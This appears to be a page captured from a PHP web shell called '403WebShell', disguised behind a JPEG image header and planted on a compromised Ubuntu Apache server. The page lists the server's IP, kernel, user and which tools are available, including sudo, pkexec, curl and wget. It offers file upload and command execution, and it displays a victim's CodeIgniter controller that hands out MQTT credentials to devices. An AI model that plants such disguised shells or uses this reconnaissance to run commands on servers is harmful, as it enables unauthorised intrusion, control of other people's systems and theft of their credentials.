����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 3.137.163.99
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/app/application/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/app/application/controllers/Getdata.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class Getdata extends CI_Controller {

	public function __construct()
	{
		parent::__construct();

		//Cargamos el modelo
		$this->load->model('Getdata_model');
	}


  public function gettopics(){

		//recibimos la pass para obtener datos que nos pasa el dispo
    $password = strip_tags($this->input->post('gdp'));

		//si coincide
		if ($password == GET_DATA_PASSWORD){
			//el dispositivo nos pasa por post su número de serie
			$device_sn = strip_tags($this->input->post('sn'));
	    $result = $this->Getdata_model->gettopics($device_sn);
			//le devolvemos topico raíz, usuario y pass mqtt separados por #,
			//ojo, como el string empieza con un #, del lado de nuestro dispositivo, el tópico estará en la posición 1 del array y no en la 0
			echo "<br>#".ROOT_TOPIC."/".$result[0]['device_topic']."#".MQTT_USER."#".MQTT_PASSWORD."# ";
		}else{
			//si la clave no coincide
			echo "access denied";
		}

  }

}

Youez - 2016 - github.com/yon3zu
LinuXploit